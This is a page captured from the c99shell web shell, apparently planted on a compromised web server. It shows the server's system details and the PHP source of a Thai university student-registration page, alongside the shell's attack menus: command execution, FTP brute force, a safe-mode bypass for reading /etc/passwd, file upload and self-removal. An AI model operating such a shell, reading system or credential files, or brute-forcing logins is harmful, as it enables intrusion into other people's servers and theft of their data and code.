!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/eregis/   drwxrwxrwx
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_showStudent.php (5.21 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$row_cur 
= (isset($qu_cur) && $qu_cur!=NULL) ? $qu_cur->row() : NULL;
$row_tm = (isset($qu_tm) && $qu_tm!=NULL) ? $qu_tm->row() : NULL;
$row_gen = (isset($qu_gen) && $qu_gen!=NULL) ? $qu_gen->row() : NULL;
?>
<table width="100%" align="center">
    <tr>
        <td>
            <div align="center"><table width="100%">
                <tr>
                    <td align="center"><span class="h error">รายชื่อนักศึกษาใหม่ตามหลักสูตร</span></td>
                </tr>
                <tr>
                    <td><br /></td>
                </tr>
                <tr>
                    <td><?php echo form_open($this->config->item("rg_folder")."student/std_search");?>
                    <table class="szone">
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">หลักสูตร</td>
                            <td>
<?php
                            
echo form_dropdown('curId'$rs_cursetValue('curId'$rs_cur));
?>
                            <span class="error">*<?php echo form_error('curId');?></span></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">ภาค/ปีการศึกษาที่เข้า
                            <td>
<?php
                            
echo form_dropdown('tmId'$rs_tmset_value('tmId',$tmId));
?>
                            /
<?php
                            
echo form_dropdown('adY'$rs_tmcset_value('adY',$acY));
?>
                            </td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td colspan="2" align="center">
                            <input type="submit" name="search" id="search" value="ค้นหา" /></td>
                        </tr>
                    </table><?php echo form_close();?></td>
                </tr>
                <tr>
                    <td><b>หลักสูตร</b><?php echo ($row_cur!=NULL) ? ' : '.setValue('curName',$row_cur).' ปีการศึกษา '.setValue('tmCode',$row_tm).'/'.$adY ' : -';?></td>
                </tr>
<?php
                
echo form_open($this->config->item("rg_folder")."student/std_add", array('name' => 'm_form1''id' => 'm_form1'));
?>
                <tr>
                    <td><table class="headCol">
                            <tr>
                                <th class="seqCol">ลำดับที่</th>
                                <th class="stdCodeCol">รหัสนักศึกษา</th>
                                <th>ชื่อ-สกุล</th>
                                <th>เจ้าของทุน</th>
                                <th class="editCol">แก้ไข</th>
                                <th class="deleteCol">ลบ</th>
                            </tr>
<?php
                    $i 
0;
                    if(isset(
$rs_std) && $rs_std->num_rows()) {
                        foreach(
$rs_std->result() as $row) {
                            echo 
"<tr onmouseover=\"bgColor='".$tr_color_even."'\" onmouseout=\"bgColor='".$this->config->item("rg_mouseout")."'\">";
?>
                                 <td align="center"><?php echo $i+1;?></td>
                                <td align="center"><?php echo ($row->stdGenStatus=='Y') ? $row->stdCode "";?></td>
                                <td class="indent"><?php echo $row->prefixName.$row->stdName." ".$row->stdSurname;?></td>
                                <td class="indent"><?php echo $row->soName;
                                if(
$row->stdSoId!=1
                                    echo 
' จ.'.$row->provinceName;?></td>
                                <td align="center">
                                <img src="<?php echo base_url().$this->config->item('rg_edit');?>" align="absmiddle" border="0" class="hand" onClick="sendPost('hidform', {'stdId':<?php echo $row->stdId;?>, 'adY':<?php echo $row->stdAdY;?>, 'tmId':<?php echo $row->stdTmIdAdmit;?>, 'curId':<?php echo $row->stdCurId;?>, 'genId':<?php echo $row->stdGenId;?>},'<?php echo site_url($this->config->item('rg_folder').'student/std_add');?>')" />
                                </td>
                                <td align="center">
<?php
                                
if($row->stdGenStatus=='Y') {
                                    echo 
'-';
                                } else {
?>
                                <span onClick="confirmDel2({stdId:<?php echo $row->stdId;?>}, 'm_form1','<?php echo site_url($this->config->item('rg_folder').'student/std_delete');?>')" /><img src="<?php echo base_url().$this->config->item('rg_delete');?>" align="absmiddle" border="0" width="16" height="19" class="hand"/></span>
<?php
                                
}
?>
                                </td>
                            </tr>
<?php
                            $i
++;
                        }
                    } else {
?>
                            <tr>
                                <td height="22" colspan="6" align="center"><span class="error">** ไม่ปรากฏข้อมูลในฐานข้อมูล **</span></td>
                            </tr>
<?php
                    
}
                    if(isset(
$flgmsg)) {
?>
                            <tr>
                                <td height="22" colspan="6" align="center"><span class="error"><?php echo $flgmsg;?></span></td>
                            </tr>
<?php
                    
}
?>
                        </table>
                    </td>
                </tr>
                <tr>
                    <td align="right">รวม <?php echo $i;?> รายการ</td>
                </tr>
                <tr>
                    <td align="left">
                    <input type="submit" name="add" id="add" value="เพิ่มรายการ" <?php echo (isset($flgmsg) || $row_cur==NULL) ? 'disabled' '';?> />
                    <input type="submit" name="addSpe" id="addSpe" value="เพิ่มแบบกำหนดรหัสนักศึกษาเอง" <?php echo (isset($flgmsg) || $i==|| $genStatus=='N') ? 'disabled' '';?> />
                    <input type="hidden" name="curId" id="curId" value="<?php echo setValue('curId',$row_cur);?>" />
                    <input type="hidden" name="tmId" id="tmId" value="<?php echo setValue('tmId',$row_tm);?>" />
                    <input type="hidden" name="adY" id="adY" value="<?php echo isset($adY) ? $adY '';?>" />
                    <input type="hidden" name="genId" id="genId" value="<?php echo setValue('genId',$row_gen);?>" /></td>
                </tr><?php echo form_close();?>
            </table></div>
        </td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0069 ]--